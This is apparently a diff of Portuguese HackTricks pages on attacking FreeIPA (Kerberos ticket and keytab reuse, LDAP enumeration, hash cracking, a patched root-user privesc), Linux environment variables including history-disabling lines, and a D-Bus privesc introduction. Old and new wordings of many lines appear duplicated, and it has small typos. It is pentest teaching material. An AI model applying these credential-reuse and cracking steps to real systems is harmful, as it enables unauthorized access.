### Chaveiro Unix
**Analisar** um Ticket CCACHE pode ser facilmente realizado de várias maneiras diferentes. O método mais simples é analisá-lo com o binário klist.
```
klist /tmp/krb5cc_0
```
```markdown
Para um atacante, reutilizar um Ticket CCACHE é muito fácil. Para **reutilizar** um Ticket CCACHE válido, **exporte** **KRB5CCNAME** para o **caminho** do arquivo de ticket válido. O sistema deve reconhecer a variável de ambiente e tentará usar esse material de credencial ao interagir com o domínio.
```
```bash
export KRB5CCNAME=/tmp/krb5cc_0
klist
```
### **Unix Keyring**
Alternativamente, Tickets CCACHE podem ser armazenados no chaveiro do Linux, oferecendo mais controle sobre o gerenciamento de tickets. O escopo de armazenamento de tickets varia (`KEYRING:nome`, `KEYRING:processo:nome`, `KEYRING:thread:nome`, `KEYRING:sessão:nome`, `KEYRING:persistente:uidnúmero`), com `klist` capaz de analisar essas informações para o usuário. No entanto, reutilizar um Ticket CCACHE do chaveiro Unix pode apresentar desafios, com ferramentas como **Tickey** disponíveis para extrair tickets Kerberos.
CCACHE Tickets podem também ser **armazenados** no **keyring** do Linux. O keyring vive dentro do **kernel** e oferece aos administradores **mais controle sobre a recuperação e uso de tickets armazenados**. Os tickets podem ser delimitados das seguintes maneiras:
### Keytab
* **`KEYRING:name`:** Tickets são delimitados a um Keyring nomeado específico.
* **`KEYRING:process:name`:** Tickets são delimitados a um id de processo específico.
* **`KEYRING:thread:name`:** Tickets são delimitados a uma thread específica.
* **`KEYRING:session:name`:** Tickets são delimitados a uma sessão de usuário específica.
* **`KEYRING:persistent:uidnumber`:** Tickets são delimitados a um usuário específico independentemente da sessão (padrão).
Arquivos Keytab, contendo princípios Kerberos e chaves criptografadas, são críticos para obter tickets de concessão de tickets (TGT) válidos sem precisar da senha do princípio. Analisar e reutilizar credenciais de arquivos Keytab pode ser facilmente realizado com utilitários como `klist` e scripts como **KeytabParser**.
Dependendo de como o administrador delimitou o ticket armazenado dentro do Unix keyring, analisá-lo pode ser difícil. No entanto, o **escopo** **padrão** para CCACHE Tickets no Unix keyring é **`KEYRING:persistent:uidnumber`**. Felizmente, se você está no **contexto** do **usuário**, `klist` pode **analisar** essa informação para nós.
Como atacante, **reutilizar um CCACHE** Ticket armazenado no Unix **keyring** é bastante **difícil** dependendo de como o ticket é delimitado. Felizmente [@Zer1t0](https://github.com/Zer1t0) da [@Tarlogic](https://twitter.com/Tarlogic) desenvolveu uma ferramenta que pode extrair tickets Kerberos do Unix keyring. A ferramenta chama-se **Tickey** e pode ser encontrada [**aqui**](https://github.com/TarlogicSecurity/tickey).
### Keytab <a href="#ff38" id="ff38"></a>
{% hint style="warning" %}
geralmente, cada host é implantado com uma credencial keytab para aquele host que pode ser usada para obter um Ticket Granting Ticket (TGT) válido do Credential Cache (CCACHE) para o próprio host.
{% endhint %}
Consiste em pares de **principais Kerberos e chaves criptografadas** que são derivadas da senha Kerberos associada ao principal. Como essas chaves são derivadas da senha do principal, se essa **senha mudar o keytab será invalidado**.
Arquivos keytab podem ser usados para **obter um ticket granting ticket** (TGT) válido para o principal ao qual está delimitado. Esse processo de autenticação **não requer a senha**, pois contém chaves derivadas da senha.
Analisar um arquivo keytab é muito fácil e pode ser feito de algumas maneiras. A maneira mais fácil de **analisar** um arquivo **keytab** é com **klist**. A segunda maneira utiliza uma ótima utilidade python que [Cody Thomas](https://medium.com/u/645ffcef8682?source=post\_page-----77e73d837d6a--------------------------------) criou. Seu projeto [**KeytabParser**](https://github.com/its-a-feature/KeytabParser) **analisará** o principal e suas chaves criptografadas relevantes.
Atacantes podem **reutilizar credenciais armazenadas em arquivos keytab gerando um CCACHE Ticket** através do binário kinit.
```powershell
# Parse keytab
klist -k /rtc/krb5.keytab
# Get TGT
kinit -kt /etc/krb5.keytab host/bastion.westeros.local@WESTEROS.LOCAL
```
### Cheatsheet
Você pode encontrar mais informações sobre como usar tickets no linux no seguinte link:
Você pode encontrar mais informações sobre como usar tickets no Linux no seguinte link:
{% content-ref url="privilege-escalation/linux-active-directory.md" %}
[linux-active-directory.md](privilege-escalation/linux-active-directory.md)
@ -125,18 +62,18 @@ Você pode encontrar mais informações sobre como usar tickets no linux no segu
## Enumeração
{% hint style="warning" %}
Você pode realizar a **enumeração** via **ldap** e outras ferramentas **binárias**, ou **conectando-se à página web na porta 443 do servidor FreeIPA**.
Você pode realizar a **enumeração** via **ldap** e outras **ferramentas binárias**, ou **conectando-se à página da web na porta 443 do servidor FreeIPA**.
{% endhint %}
### Hosts, Usuários e Grupos <a href="#4b3b" id="4b3b"></a>
É possível criar **hosts**, **usuários** e **grupos**. Hosts e usuários são organizados em contêineres chamados “**Host Groups**” e “**User Groups**”, respectivamente. Estes são semelhantes a **Unidades Organizacionais** (OU).
É possível criar **hosts**, **usuários** e **grupos**. Hosts e usuários são classificados em contêineres chamados "**Grupos de Hosts**" e "**Grupos de Usuários**" respectivamente. Esses são semelhantes às **Unidades Organizacionais** (OU).
Por padrão no FreeIPA, o servidor LDAP permite **binds anônimos**, e uma grande quantidade de dados é enumerável **sem autenticação**. Isso pode enumerar todos os dados disponíveis sem autenticação:
Por padrão no FreeIPA, o servidor LDAP permite **ligações anônimas**, e uma grande quantidade de dados é enumerável **não autenticada**. Isso pode enumerar todos os dados disponíveis não autenticados:
```
ldapsearch -x
```
Para obter **mais informações**, você precisa usar uma sessão **autenticada** (consulte a seção de Autenticação para aprender como preparar uma sessão autenticada).
Para obter **mais informações**, você precisa usar uma sessão **autenticada** (verifique a seção de Autenticação para aprender como preparar uma sessão autenticada).
```bash
# Get all users of domain
ldapsearch -Y gssapi -b "cn=users,cn=compat,dc=domain_name,dc=local"
@ -150,7 +87,7 @@ ldapsearch -Y gssapi -b "cn=computers,cn=accounts,dc=domain_name,dc=local"
# Get hosts groups
ldapsearch -Y gssapi -b "cn=hostgroups,cn=accounts,dc=domain_name,dc=local"
```
De uma máquina associada ao domínio, você poderá usar **binários instalados** para enumerar o domínio:
A partir de uma máquina integrada ao domínio, você poderá usar **binários instalados** para enumerar o domínio:
```bash
ipa user-find
ipa usergroup-find
@ -165,33 +102,33 @@ ipa host-find <host> --all
ipa hostgroup-show <host group> --all
```
{% hint style="info" %}
O usuário **admin** do **FreeIPA** é equivalente aos **domain admins** do **AD**.
O usuário **admin** do **FreeIPA** é equivalente aos **administradores de domínio** do **AD**.
{% endhint %}
### Hashes <a href="#482b" id="482b"></a>
O usuário **root** do **servidor IPA** tem acesso aos **hashes** de senha.
* O hash de senha de um usuário é armazenado como **base64** no **atributo** “**userPassword**”. Esse hash pode ser **SSHA512** (versões antigas do FreeIPA) ou **PBKDF2\_SHA256**.
* O **Nthash** da senha armazenado como **base64** em “**ipaNTHash**” se o sistema tem **integração** com **AD**.
- O hash da senha de um usuário é armazenado como **base64** no atributo "**userPassword**". Esse hash pode ser **SSHA512** (versões antigas do FreeIPA) ou **PBKDF2\_SHA256**.
- O **Nthash** da senha é armazenado como **base64** em "**ipaNTHash**" se o sistema estiver integrado com o **AD**.
Para quebrar esses hashes:
• Se o freeIPA estiver integrado com AD, **ipaNTHash** é fácil de quebrar: Você deve **decodificar** **base64** -> recodificá-lo como hex **ASCII** -> John The Ripper ou **hashcat** podem ajudá-lo a quebrá-lo rapidamente
- Se o FreeIPA estiver integrado com o AD, o **ipaNTHash** é fácil de quebrar: Você deve **decodificar** o **base64** -> re-codificá-lo como **hexadecimal ASCII** -> John The Ripper ou **hashcat** podem ajudar a quebrá-lo rapidamente.
• Se uma versão antiga do FreeIPA estiver sendo usada, então **SSHA512** é usado: Você deve decodificar **base64** -> encontrar o **hash** SSHA512 -> John The Ripper ou **hashcat** podem ajudá-lo a quebrá-lo
- Se uma versão antiga do FreeIPA for usada, então o **SSHA512** é usado: Você deve decodificar o **base64** -> encontrar o **hash SSHA512** -> John The Ripper ou **hashcat** podem ajudar a quebrá-lo.
• Se uma versão nova do FreeIPA estiver sendo usada, então **PBKDF2\_SHA256** é usado: Você deve decodificar **base64** -> encontrar PBKDF2\_SHA256 -> seu **comprimento** é de 256 bytes. John pode trabalhar com 256 bits (32 bytes) -> SHA-256 usado como a função pseudo-aleatória, tamanho do bloco é de 32 bytes -> você pode usar apenas os primeiros 256 bits do nosso hash PBKDF2\_SHA256 -> John The Ripper ou hashcat podem ajudá-lo a quebrá-lo
- Se uma nova versão do FreeIPA for usada, então o **PBKDF2\_SHA256** é usado: Você deve decodificar o **base64** -> encontrar o **PBKDF2\_SHA256** -> seu **comprimento** é de 256 bytes. O John pode trabalhar com 256 bits (32 bytes) -> SHA-265 é usado como a função pseudo-aleatória, o tamanho do bloco é de 32 bytes -> você pode usar apenas os primeiros 256 bits do nosso hash PBKDF2\_SHA256 -> John The Ripper ou hashcat podem ajudar a quebrá-lo.
<figure><img src="../.gitbook/assets/image (33).png" alt=""><figcaption></figcaption></figure>
Para extrair os hashes você precisa ser **root no servidor FreeIPA**, lá você pode usar a ferramenta **`dbscan`** para extraí-los:
Para extrair os hashes, você precisa ser **root no servidor FreeIPA**, lá você pode usar a ferramenta **`dbscan`** para extraí-los:
<figure><img src="../.gitbook/assets/image (196).png" alt=""><figcaption></figcaption></figure>
### Regras HBAC <a href="#482b" id="482b"></a>
Estas são as regras que concedem permissões específicas a usuários ou hosts sobre recursos (hosts, serviços, grupos de serviços...).
São regras que concedem permissões específicas a usuários ou hosts sobre recursos (hosts, serviços, grupos de serviços...).
```bash
# Enumerate using ldap
ldapsearch -Y gssapi -b "cn=hbac,dc=domain_name,dc=local"
@ -200,9 +137,9 @@ ipa hbacrule-find
# Show info of rule
ipa hbacrule-show <hbacrule> --all
```
#### Regras de Sudo
#### Regras do Sudo
FreeIPA oferece a capacidade de **gerenciar permissões sudo** de uma fonte **centralizada** através de regras de sudo. Esses conjuntos de regras podem ser usados para restringir ou delegar a capacidade de **executar comandos como sudo** em hosts inscritos no domínio. Como atacante, podemos enumerar quais hosts e usuários esses conjuntos de regras são aplicados, e quais comandos são permitidos através do conjunto de regras.
O FreeIPA permite o controle centralizado sobre as **permissões do sudo** por meio de regras do sudo. Essas regras permitem ou limitam a execução de comandos com sudo em hosts dentro do domínio. Um atacante poderia potencialmente identificar os hosts aplicáveis, usuários e comandos permitidos examinando esses conjuntos de regras.
```bash
# Enumerate using ldap
ldapsearch -Y gssapi -b "cn=sudorules,cn=sudo,dc=domain_name,dc=local"
@ -213,21 +150,15 @@ ipa sudorule-show <sudorule> --all
```
### Controle de Acesso Baseado em Funções
Cada **função** contém um conjunto de **privilégios**, e esses respectivos privilégios contêm um **conjunto** de **permissões**. Funções podem ser **aplicadas a Usuários**, **Grupos** de Usuários, **Hosts**, Grupos de Hosts e Serviços. Para ilustrar esse conceito, vamos discutir a função padrão de "Administrador de Usuário" no FreeIPA.
Um **papel** é composto por vários **privilégios**, cada um dos quais engloba uma coleção de **permissões**. Esses papéis podem ser atribuídos a Usuários, **Grupos** de Usuários, **Hosts**, Grupos de Hosts e Serviços. Por exemplo, considere o papel padrão de "Administrador de Usuário" no FreeIPA para exemplificar essa estrutura.
<figure><img src="../.gitbook/assets/image (161).png" alt=""><figcaption></figcaption></figure>
O papel `Administrador de Usuário` possui esses privilégios:
Como a captura de tela acima mostra, a função de “Administrador de Usuário” contém os seguintes privilégios:
- **Administradores de Usuários**
- **Administradores de Grupos**
- **Administradores de Usuários de Estágio**
* **Administradores de Usuários**
* **Administradores de Grupos**
* **Administradores de Usuário em Estágio**
Podemos detalhar ainda mais e enumerar as **permissões** delegadas a cada **privilégio**:
<figure><img src="../.gitbook/assets/image (189).png" alt=""><figcaption></figcaption></figure>
Como podemos ver, a função de “**Administrador de Usuário**” contém **muitas permissões** dentro do ambiente. Entender o conceito geral e a estrutura de **funções**, **privilégios** e **permissões** pode ser crítico para identificar caminhos de ataque em todo o ambiente.
Com os seguintes comandos é possível enumerar os papéis, privilégios e permissões:
```bash
# Using ldap
ldapsearch -Y gssapi -b "cn=roles,cn=accounts,dc=westeros,dc=local"
@ -250,44 +181,32 @@ Em [https://posts.specterops.io/attacking-freeipa-part-iii-finding-a-path-677405
## Privesc
### ~~criação de usuário root~~
### ~~Criação de usuário root~~
{% hint style="warning" %}
Se você pode **criar um novo usuário com o nome `root`**, você pode se passar por ele e será capaz de **acessar qualquer máquina via SSH como root.**
Se você puder **criar um novo usuário com o nome `root`**, você pode se passar por ele e será capaz de **fazer SSH em qualquer máquina como root.**
**ISSO FOI CORRIGIDO.**
{% endhint %}
O privilégio "**User Administrators**" é muito poderoso (como o próprio nome indica):
Você pode conferir uma explicação detalhada em [https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b](https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b)
<figure><img src="../.gitbook/assets/image (182).png" alt=""><figcaption></figcaption></figure>
Com esse privilégio vem uma série de diferentes poderes para afetar usuários dentro do ambiente. Usando esse privilégio, podemos **criar um novo usuário dentro do domínio FreeIPA chamado \_root**\_.
<figure><img src="../.gitbook/assets/image (158).png" alt=""><figcaption></figcaption></figure>
Uma vez que o usuário é criado no domínio, podemos **obter um ticket para a conta com \_kinit**\_.
<figure><img src="../.gitbook/assets/image (178).png" alt=""><figcaption></figcaption></figure>
Agora podemos tentar **SSH** usando nossa recém-criada conta de domínio root.
<figure><img src="../.gitbook/assets/image (176).png" alt=""><figcaption></figcaption></figure>
Como mostrado, isso **coloca o usuário na conta root local**! Então, simplesmente criando um usuário de domínio para um usuário local, conseguimos autenticar usando a conta _root@WESTEROS.LOCAL_ e obter o **contexto de usuário da conta root local**_._
_Para mais detalhes sobre essa vulnerabilidade, confira_ [_https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b_](https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b)\\
# Referências
* [https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b](https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b)
* [https://posts.specterops.io/attacking-freeipa-part-i-authentication-77e73d837d6a](https://posts.specterops.io/attacking-freeipa-part-i-authentication-77e73d837d6a)
* [https://posts.specterops.io/attacking-freeipa-part-ii-enumeration-ad27224371e1](https://posts.specterops.io/attacking-freeipa-part-ii-enumeration-ad27224371e1)
* [https://www.youtube.com/watch?v=9dOu-7BTwPQ](https://www.youtube.com/watch?v=9dOu-7BTwPQ)
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

73
linux-hardening/linux-environment-variables.md
View file

@ -1,18 +1,20 @@
# Variáveis de ambiente do Linux
# Variáveis de Ambiente do Linux
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
Outras maneiras de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
## Variáveis globais
## Variáveis Globais
As variáveis globais **serão** herdadas pelos **processos filhos**.
@ -21,7 +23,7 @@ Você pode criar uma variável global para sua sessão atual fazendo:
export MYGLOBAL="hello world"
echo $MYGLOBAL #Prints: hello world
```
Esta variável será acessível por suas sessões atuais e seus processos filhos.
Esta variável será acessível pelas suas sessões atuais e seus processos filhos.
Você pode **remover** uma variável fazendo:
```bash
@ -36,6 +38,10 @@ echo $LOCAL
unset LOCAL
```
## Listar variáveis atuais
```bash
printenv
```
```bash
set
env
@ -49,22 +55,15 @@ cat /proc/`python -c "import os; print(os.getppid())"`/environ
* _**/etc/bash.bashrc**_: Este arquivo é lido sempre que um shell interativo é iniciado (terminal normal) e todos os comandos especificados aqui são executados.
* _**/etc/profile e /etc/profile.d/\***_**:** Este arquivo é lido toda vez que um usuário faz login. Assim, todos os comandos executados aqui serão executados apenas uma vez no momento do login do usuário.
* \*\*Exemplo: \*\*
* \*\*Exemplo: \*\*
`/etc/profile.d/somescript.sh`
`/etc/profile.d/somescript.sh`
```bash
#!/bin/bash
TEST=$(cat /var/somefile)
export $TEST
```
#### **Arquivos que afetam o comportamento de apenas um usuário específico:**
* _**\~/.bashrc**_: Este arquivo funciona da mesma maneira que o arquivo _/etc/bash.bashrc_, mas é executado apenas para um usuário específico. Se você quiser criar um ambiente para si mesmo, modifique ou crie este arquivo em seu diretório home.
* _**\~/.profile, \~/.bash\_profile, \~/.bash\_login**_**:** Esses arquivos são iguais ao arquivo _/etc/profile_. A diferença está na forma como é executado. Este arquivo é executado apenas quando um usuário em cujo diretório home este arquivo existe faz login.
**Extraído de:** [**aqui**](https://codeburst.io/linux-environment-variables-53cea0245dc9) **e** [**aqui**](https://www.gnu.org/software/bash/manual/html\_node/Bash-Startup-Files.html)
```bash
#!/bin/bash
TEST=$(cat /var/somefile)
export $TEST
```
## Variáveis comuns
@ -73,15 +72,15 @@ De: [https://geek-university.com/linux/common-environment-variables/](https://ge
* **DISPLAY** o display usado pelo **X**. Esta variável geralmente é definida como **:0.0**, o que significa o primeiro display no computador atual.
* **EDITOR** o editor de texto preferido do usuário.
* **HISTFILESIZE** o número máximo de linhas contidas no arquivo de histórico.
* \*\*HISTSIZE - \*\*Número de linhas adicionadas ao arquivo de histórico quando o usuário termina sua sessão.
* **HOME** seu diretório home.
* **HISTSIZE** Número de linhas adicionadas ao arquivo de histórico quando o usuário termina sua sessão.
* **HOME** seu diretório pessoal.
* **HOSTNAME** o nome do host do computador.
* **LANG** seu idioma atual.
* **MAIL** o local do spool de correio do usuário. Geralmente **/var/spool/mail/USER**.
* **MANPATH** a lista de diretórios para procurar páginas do manual.
* **MAIL** a localização do correio do usuário. Geralmente **/var/spool/mail/USER**.
* **MANPATH** a lista de diretórios para pesquisar páginas do manual.
* **OSTYPE** o tipo de sistema operacional.
* **PS1** o prompt padrão no bash.
* \*\*PATH - \*\*armazena o caminho de todos os diretórios que contêm arquivos binários que você deseja executar apenas especificando o nome do arquivo e não pelo caminho relativo ou absoluto.
* **PATH** armazena o caminho de todos os diretórios que contêm arquivos binários que você deseja executar apenas especificando o nome do arquivo e não o caminho relativo ou absoluto.
* **PWD** o diretório de trabalho atual.
* **SHELL** o caminho para o shell de comando atual (por exemplo, **/bin/bash**).
* **TERM** o tipo de terminal atual (por exemplo, **xterm**).
@ -98,20 +97,20 @@ export HISTFILESIZE=0
```
### **HISTSIZE**
Altere o **valor desta variável para 0**, assim quando você **encerrar sua sessão**, nenhum comando será adicionado ao **arquivo de histórico** (\~/.bash\_history).
Altere o **valor desta variável para 0**, para que quando você **encerrar sua sessão**, nenhum comando seja adicionado ao **arquivo de histórico** (\~/.bash\_history).
```bash
export HISTSIZE=0
```
### http\_proxy & https\_proxy
Os processos usarão o **proxy** declarado aqui para se conectar à internet através do **http ou https**.
Os processos usarão o **proxy** declarado aqui para se conectar à internet através de **http ou https**.
```bash
export http_proxy="http://10.10.10.10:8080"
export https_proxy="http://10.10.10.10:8080"
```
### SSL\_CERT\_FILE & SSL\_CERT\_DIR
Os processos confiarão nos certificados indicados nessas variáveis de ambiente.
Os processos confiarão nos certificados indicados nestas **variáveis de ambiente**.
```bash
export SSL_CERT_FILE=/path/to/ca-bundle.pem
export SSL_CERT_DIR=/path/to/ca-certificates
@ -120,7 +119,7 @@ export SSL_CERT_DIR=/path/to/ca-certificates
Altere a aparência do seu prompt.
Eu criei [**este**](https://gist.github.com/carlospolop/43f7cd50f3deea972439af3222b68808) (baseado em outro, leia o código).
[**Este é um exemplo**](https://gist.github.com/carlospolop/43f7cd50f3deea972439af3222b68808)
Root:
@ -137,15 +136,3 @@ Um, dois e três trabalhos em segundo plano:
Um trabalho em segundo plano, um parado e o último comando não terminou corretamente:
![](<../.gitbook/assets/image (90).png>)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

492
linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md
View file

@ -1,88 +1,79 @@
# Enumeração D-Bus e Escalação de Privilégios por Injeção de Comandos
# Enumeração e Injeção de Comandos de Privilégio D-Bus
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
## **Enumeração GUI**
**(Esta informação de enumeração foi retirada de** [**https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/**](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/)**)**
O D-Bus é utilizado como mediador de comunicações entre processos (IPC) em ambientes de desktop Ubuntu. No Ubuntu, a operação concorrente de vários barramentos de mensagens é observada: o barramento do sistema, principalmente utilizado por **serviços privilegiados para expor serviços relevantes em todo o sistema**, e um barramento de sessão para cada usuário logado, expondo serviços relevantes apenas para aquele usuário específico. O foco aqui é principalmente no barramento do sistema devido à sua associação com serviços em execução com privilégios mais elevados (por exemplo, root), uma vez que nosso objetivo é elevar privilégios. Observa-se que a arquitetura do D-Bus emprega um 'roteador' por barramento de sessão, que é responsável por redirecionar mensagens de clientes para os serviços apropriados com base no endereço especificado pelos clientes para o serviço com o qual desejam se comunicar.
O Ubuntu desktop utiliza o D-Bus como seu mediador de comunicações interprocessuais (IPC). No Ubuntu, existem vários barramentos de mensagens que são executados simultaneamente: um barramento do sistema, que é principalmente usado por **serviços privilegiados para expor serviços relevantes em todo o sistema**, e um barramento de sessão para cada usuário conectado, que expõe serviços que são relevantes apenas para esse usuário específico. Como tentaremos elevar nossos privilégios, nos concentraremos principalmente no barramento do sistema, pois os serviços lá tendem a ser executados com privilégios mais elevados (ou seja, root). Observe que a arquitetura do D-Bus utiliza um "roteador" por barramento de sessão, que redireciona as mensagens do cliente para os serviços relevantes com os quais estão tentando interagir. Os clientes precisam especificar o endereço do serviço para o qual desejam enviar mensagens.
